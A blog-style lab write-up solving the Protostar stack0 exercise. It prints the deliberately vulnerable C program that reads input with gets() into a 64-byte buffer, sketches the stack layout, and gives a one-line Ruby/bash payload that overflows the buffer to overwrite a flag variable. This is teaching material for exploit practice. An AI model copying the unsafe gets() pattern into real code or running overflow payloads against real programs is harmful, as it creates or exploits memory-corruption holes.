$$\ $$\ $$\ $$ | $$ | $$ | $$$$$$$\ $$ | $$$$$$\ $$$$$$\ $$$$$$$$\ $$ | $$$$$$\ $$\ $$\ $$\ $$$$$$\ $$$$$$\ $$$$$$\$$$$\ $$ __$$\ $$ |$$ __$$\ $$ __$$\ \____$$ |$$ |$$ __$$\ $$ | $$ | $$ |$$ __$$\ \____$$\ $$ _$$ _$$\ $$ | $$ |$$ |$$ / $$ |$$ / $$ | $$$$ _/ $$ |$$ / $$ |$$ | $$ | $$ |$$ | \__|$$$$$$$ |$$ / $$ / $$ | $$ | $$ |$$ |$$ | $$ |$$ | $$ | $$ _/ $$ |$$ | $$ |$$ | $$ | $$ |$$ | $$ __$$ |$$ | $$ | $$ | $$$$$$$ |$$ |\$$$$$$ |\$$$$$$$ |$$\ $$$$$$$$\ $$ |\$$$$$$ |\$$$$$\$$$$ |$$ | $$\\$$$$$$$ |$$ | $$ | $$ | \_______/ \__| \______/ \____$$ |\__|\________|\__| \______/ \_____\____/ \__| \__|\_______|\__| \__| \__| $$\ $$ | \$$$$$$ | \______/
This is going to be a series of posts with the write-ups of the exercises I solve from exploit-exercises’s protostar.
In this exercise we are asked to overwrite the value of the variable “modified”, as it is the one checked in order to obtain the “good boy” message.
#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>
int main(int argc, char **argv)
{
volatile int modified;
char buffer[64];
modified = 0;
gets(buffer);
if(modified != 0) {
printf("you have changed the 'modified' variable\n");
} else {
printf("Try again?\n");
}
}
To do so, we need to have a clear vision of what would be the stack layout for this code:
+------------+ Lower addresses
| ... |
+------------+
| buffer |
| . |
| . |
+------------+
| modified |
+------------+
| stored_ebp |
+------------+
| ret |
+------------+
| argc |
+------------+
| argv |
+------------+
| ... |
+------------+ Higher addresses
If we take into account that the stack grows towards lower memory addresses, and that is written towards higher addresses, the exercise turns to be trivial to solve.
You only need to stuff 64 bytes into “buffer”, with an extra byte with value different than 0, to overwrite “modified”.
We will use ruby and bash for writing the solution to this exercise:
#!/bin/bash
ruby -e ' puts "A"*64 + "1" ' | ./stack0